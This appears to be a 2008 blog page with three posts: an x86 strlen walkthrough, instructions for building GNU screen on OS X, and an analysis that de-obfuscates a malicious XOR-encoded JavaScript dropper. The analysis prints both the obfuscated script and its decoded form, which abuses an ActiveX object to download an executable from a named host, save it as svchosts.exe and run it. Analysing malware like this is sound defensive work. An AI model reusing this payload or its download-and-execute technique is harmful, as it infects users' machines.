Inline strlen function in assembly

I know the strlen function in assembly has been covered on the internet before, but I figured I’ve cover it again, just in case someone like myself were searching google for it ;) ; here’s the code:

00404334 sub_404334 proc near
00404334  push edi
00404335  push eax
00404336  push ecx
00404337  mov edi, edx
00404339  xor eax, eax
0040433B  repne scasb
0040433D  jnz short loc_404341
0040433F  not ecx
00404341 loc_404341:
00404341  pop eax
00404342  add ecx, eax
00404344  pop eax
00404345  pop edi
00404346  jmp sub_4041BC
00404346 sub_404334 endp

The inputs for this function come from edx and ecx, edx holds a pointer to our string (in this example, the string is the location of the windows directory, so I’m going to say it’s “C:\Windows”). Ecx holds the maximum length of the string, which is 256 in this example. This is important as ecx is used as a countdown while the string is checked. Let’s go line-by-line:

00404334  push edi
00404335  push eax
00404336  push ecx

These 3 lines just save the variables to the stack so they’re not overwritten, standard stuff.

00404337  mov edi, edx
00404339  xor eax, eax

edx (which is a LPCSTR to “C:\Windows”) is moved into edi (you’ll see why in a second). Eax is XOR’d with itself to reset it to 0. The next instructions will compare each character in the string with al, so essentially it’s searching for the NULL character ‘\0′

0040433B  repne scasb

This instruction works from the beginning of edi, comparing each character of the string to whatever is in al (which is ‘\0′ or NULL right now). It decrements ecx for every character it compares (scans). If it does not find a match (repne – repeat-ne==Not Equal), it moves to the next character. In our example “C:\Windows” (terminated by NULL, like a good string should), ecx will decrease from 256 to 246 (C – 256, : – 255, \ – 254, W – 253, i – 252, n – 251, d – 250, o – 249, w – 248, s – 247, \0 – 246)

0040433D  jnz short loc_404341

If the end of the string was reached and there were not NULL bytes, jump to location 0×404341. In our example, it’s not jumped.

0040433F  not ecx

Flip all the bits in ecx, since ecx will be treated as a signed number, this makes ecx = -ecx. Note that if the end of the string is reached (ecx = 0), this instruction would be skipped by the jump in the previous instruction. In our example however, ecx becomes -246 (or 0xFFFFFF09).

00404341 loc_404341:
00404341  pop eax
00404342  add ecx, eax

Ecx’s starting value (256, remember?) is popped back into eax. Eax is then added to ecx and the result is stored in ecx. Therefore:

eax = 256
ecx = ecx + eax
ecx = -246 + 256
ecx = 10

The length of the string now resides in ecx, we can restore our original registers and jump away in the ending instructions:

00404344  pop eax
00404345  pop edi
00404346  jmp sub_4041BC

And that, is one way to get the length of a string in assembly.

 

June 6, 2008 | Filed Under Uncategorized, asm, assembly, repne, scasb, strlen | 1 Comment 

Compiling screen from CVS on OSX for vertical split.

Screen in an amazing tool. The latest version from CVS adds an amazing feature to allow you to split screens vertically (previously you could only split horizontally), which is extremely nice if you have a widescreen monitor. The only problem is that the patch isn’t yet included in MacPorts or Fink for this feature.

Here’s how to fetch it from source, patch it and build it yourself on OSX (tested on 10.5.3). First we need to check out the source:

shell> cvs -z3 -d:pserver:anonymous@cvs.savannah.gnu.org:/sources/screen co screen

Next, we need to manually apply the patches from MacPorts (assuming you’ve used MacPorts before). First change into the screen directory and apply the following 3 patches:

shell> cd screen/src
shell> patch < /opt/local/var/macports/sources/rsync.macports.org/
release/ports/sysutils/screen/files/patch-maxargs
shell> patch < /opt/local/var/macports/sources/rsync.macports.org/
release/ports/sysutils/screen/files/patch-windowsize
shell> patch < /opt/local/var/macports/sources/rsync.macports.org/
release/ports/sysutils/screen/files/patch-pty.c

(Each of those should be on one line, I had to split them up to make the wrapping better).

Now, configure using the same method as the macports:

shell> ./configure --enable-locale --enable-telnet --enable-colors256 --enable-rxct_osc

From there, you should be able to do a make and make install to get your screen up and running. Vertical-split is bound to ctrl+a – |  (control-a and pipe) (substitute whatever your bind key is for ctrl+a). Then you can use ctrl+a – :resize <x> to resize the window, where <x> is x%, -x, +x or x. Here’s a screenshot of it in action:

June 6, 2008 | Filed Under compile, cvs, macports, osx, patch, screen, terminal | 6 Comments 

Quick javascript de-obfuscation with python

Scholar was kind enough to allow me to post his/her obfuscated javascript. Here’s a quick rundown. The page was originally this:

<html>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /index.php was not found on this server.</p>
<p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p>
<hr>
</body></html><script language=JavaScript>
str = "qndy`mh)(:gtobuhno!qndy`mh)(!zw`s!doeds!<!enbtldou/bsd`udDm
dldou)&nckdbu&(:doeds/rdu@uushctud)&he&-&doeds&(:doeds/rdu@uushc
tud)&bm`rrhe&-&b&*&m&*#rhe;C#*#E8#*&7B447,74&*#@2,00#*&E1,892
@,1&*#1B#*&15G&*#B38#*&D27&(:usx!zw`s!`rp!<!doeds/Bsd`udNckdbu)
&l&*#ry#*&lm3&*#/#*&Y&*#LM#*&I&*&UUQ&-&&(:w`s!`rr!<
!doeds/Bsd`udNckdbu)#Ri#*#dmm/@#*#q#*#qmhb`#*#uhno#-
&&(:w`s!`rru!<!doeds/Bsd`udNckdbu)&`&*&e&*#nec/#*&ru&*#s#*&d`l&
-&&(:usx!z!`rru/uxqd!<!0:`rp/nqdo)&F&*#D#*&U&-&iuuq;..vn
smebihodrdvshudsr/bnl..mn`e/qiq&-g`mrd(:`rp/rdoe)(:!`rr
u/nqdo)(:`rru/Vshud)`rp/sdrqnordCnex(:w`s!hlx`!<!&/..//..r
wbinrur/dyd&:`rru/R`wdUnGhmd)hlx`-3(:`rru/Bm
nrd)(:|!b`ubi)d(!z|usx!z!`rr/ridmmdydbtud)hlx`(:!|!b`ubi
)d(!z||b`ubi)d(z||";
str2 = "";
for (i = 0; i < str.length; i ++) { str2 =  str2 + String.fromCharCode (str.charCodeAt (i) ^ 1); }; eval (str2);</script></html>

(line breaks in the str variable added so it’s actually readable). Looks like this script uses the same XOR method as the script I posted about previously. This script is actually trivial to de-obfuscate using python (I <3 ruby, but ruby doesn’t like strings with #{} in them, so it was easier just to use python instead):

shell> python
>>> str = <long-string-from-above-pasted-here>
>>> str2 = ""
>>> for i in range(0,len(str)):
. . .     str2 = str2 + chr(ord(str[i] ^ 1))


str2 now contains the de-obfuscated javascript, which after inserting line breaks, looks something like this:

poexali();
function poexali() {
 var ender = document.createElement('object');
 ender.setAttribute('id','ender');
 ender.setAttribute('classid','clsid:BD96C556-65A3-11D0-983A-00C04FC29E36');
 try {
  var asq = ender.CreateObject('msxml2.XMLHTTP','');
  var ass = ender.CreateObject("Shell.Application",'');
  var asst = ender.CreateObject('adodb.stream','');
  try {
   asst.type = 1;
   asq.open('GET','http://worldchinesewriters.com//load.php',false);
   asq.send();
   asst.open();
   asst.Write(asq.responseBody);
   var imya = './/..//svchosts.exe';
   asst.SaveToFile(imya,2);
   asst.Close();
  } catch(e) {}
  try {
   ass.shellexecute(imya);
  } catch(e) {}
 }catch(e){}
}

Which, as Scholar pointed out in his/her original email, attempts to download hxxp://worldchinesewriters.com/load.php and save it into the local file “svchosts.exe”, then execute the file.

Super-quick post, since lately I seem to be a tad verbose. What “svchosts.exe” does is left as an exercise to the reader :)

June 5, 2008 | Filed Under Uncategorized, deobfuscation, javascript, js, obfuscation, python, scholar | 1 Comment 

Bad Behavior has blocked 250 access attempts in the last 7 days.